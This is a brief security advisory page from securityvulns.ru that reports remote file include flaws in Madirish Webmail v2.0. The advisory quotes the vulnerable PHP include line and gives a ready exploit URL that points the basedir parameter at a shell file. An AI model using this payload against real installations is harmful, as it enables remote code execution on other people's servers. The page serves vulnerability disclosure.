Computer Security

Security Advisory: Madirish Webmail v2.0 Remote File Include Vulnerabilities
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [CVE-2007-1355] Tomcat documentation XSS vulnerabilities

  [Full-disclosure] Wordpress Akismet XSS flaw

  [Full-disclosure] PsychoStats 3.0.6b and prior

  ACal Web Calendar 2.2.6 Remote File Include Vulnerabilities

From:...::BoZKuRTSeRDaR::... <bozkurtserdars_(at)_gmail.com>
Date:19.05.2007
Subject:Madirish Webmail v2.0 Remote File Include Vulnerabilities

###########################################################

Madirish Webmail v2.0  Remote File Include Vulnerabilities

Author : BoZKuRTSeRDaR

Contact MSN:BoZKuRTSeRDaR@BoZKuRTSeRDaR.CoM

My Homepage :WwW.Turkmilliyetcileri.OrG

script Download : http://sourceforge.net/projects/madirishwebmail

###############################################################################
vuln code:
require_once($GLOBALS['basedir']."lib/sql.php")

exploit:

http://www.example.com/[patch]lib/addressbook.php?GLOBALS[basedir]=shell.txt
?
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru